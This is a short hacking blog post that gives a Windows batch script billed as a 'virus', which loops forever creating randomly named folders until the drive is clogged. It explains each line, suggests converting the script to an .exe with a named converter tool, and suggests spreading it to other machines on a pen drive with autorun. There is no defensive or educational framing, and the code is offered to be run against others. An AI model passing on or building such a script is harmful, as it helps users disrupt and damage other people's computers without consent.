Subscribe For Free Updates!

We'll not spam mate! We promise.

Create a virus to create a infinite folder in a drive

Hi Hackers, this batch code will very helpful for you.  This is simple and effective virus code.

As usual open notepad.
Copy this code to Notepad.
@echo off
:top
md %random%
goto top
 @echo off makes it so that it appears to be a blank screen but actually its making hundreds of folder.
md %random% is command that creating folders with random names.
goto top – return to label :top , infinite loop


Save the file with .bat extension(for eg: folderscreate.bat)

That's all if you double click the file it will create a finite folder wherever the batch file is.

You can also convert the batch file into a .exe format and pass it through a pen drive and make it as autorun

In order to convert the batch file to .exe,download this application : Bat_To_Exe_Converter

If the above link is not working just gimme a comment below,i will upload again

SOCIALIZE WITH US
SOCIALIZE IT →
FOLLOW US →
SHARE IT →

0 comments:

Post a Comment